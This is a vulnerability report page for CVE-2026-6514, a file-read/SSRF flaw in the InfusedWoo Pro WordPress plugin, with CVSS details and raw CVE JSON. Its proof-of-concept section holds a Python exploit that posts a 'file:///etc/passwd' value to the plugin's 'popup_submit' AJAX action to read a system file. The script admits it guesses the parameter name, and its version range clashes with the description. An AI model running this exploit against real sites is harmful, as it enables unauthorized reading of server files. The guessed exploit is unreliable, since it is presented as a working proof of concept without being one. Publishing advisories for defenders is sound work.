Security Vulnerability Report
CVE-2026-6514 CVSS 7.5 HIGH

Published: 2026-05-14 09:16:28
Last Modified: 2026-05-14 14:28:41

Description

The InfusedWoo Pro plugin for WordPress is vulnerable to Arbitrary File Read in all versions up to, and including, 5.1.2 via the popup_submit. This makes it possible for unauthenticated attackers to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services.

CVSS Details

CVSS Score: 7.5
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

InfusedWoo Pro <= 5.1.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# Exploit Title: InfusedWoo Pro < 5.1.2 - Arbitrary File Read (SSRF)
# Date: 2026-05-14
# Exploit Author: Analyst
# Vendor Homepage: https://infusedwoo.com/
# Software Link: https://downloads.infusedwoo.com/updater/iw5.php?changelog
# Version: <= 5.1.2
# Tested on: WordPress 6.x

target_url = "http://example.com/wp-admin/admin-ajax.php"

# The vulnerable action is 'popup_submit'
# Attack vector: reading /etc/passwd via file wrapper
data = {
    "action": "popup_submit",
    # Parameter name might vary based on plugin implementation, assuming 'file' or 'url'
    "file": "file:///etc/passwd"
}

try:
    response = requests.post(target_url, data=data)
    if response.status_code == 200:
        print("[+] Exploit successful! Response below:")
        print(response.text)
    else:
        print("[-] Exploit failed, status code:", response.status_code)
except Exception as e:
    print(f"[!] Error: {e}")

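References

https://downloads.infusedwoo.com/updater/iw5.php?changelog
https://www.wordfence.com/threat-intel/vulnerabilities/id/76b75e61-e7f8-41cc-ab4f-e6ca42d68308?source=cve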

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-6514", "sourceIdentifier": "[email protected]", "published": "2026-05-14T09:16:28.023", "lastModified": "2026-05-14T14:28:41.283", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The InfusedWoo Pro plugin for WordPress is vulnerable to Arbitrary File Read in all versions up to, and including, 5.1.2 via the popup_submit. This makes it possible for unauthenticated attackers to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-918"}]}], "references": [{"url": "https://downloads.infusedwoo.com/updater/iw5.php?changelog", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/76b75e61-e7f8-41cc-ab4f-e6ca42d68308?source=cve", "source": "[email protected]"}]}}